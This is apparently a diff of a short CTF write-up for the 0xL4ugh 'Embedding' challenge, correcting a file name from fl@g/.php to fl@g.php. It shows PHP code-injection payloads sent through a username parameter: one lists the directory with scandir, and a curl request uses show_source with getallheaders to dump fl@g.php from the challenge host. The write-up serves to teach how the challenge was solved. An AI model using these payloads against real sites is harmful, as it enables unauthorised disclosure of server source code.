JohnKHW/doc-ctfwriteup/0xL4ugh/Embedding.md

 First we try that
 > read_file(next(array_reverse(scandir('.'))))

-However, the string length is 43, we cannot get the result.\
+However, the string length is 43, we cannot get the result.

-Thus, we found that we can set the header of the request to store variable fl@g/.php\
+Thus, we found that we can set the header of the request to store variable fl@g.php

-Then, we use curl command in console to get the source code of fl@g/.php
+Then, we use curl command in console to get the source code of fl@g.php

 > curl -s -H "Flag: fl@g.php" "http://138.91.58.10/Embedding/?username=show_source(end(getallheaders()))"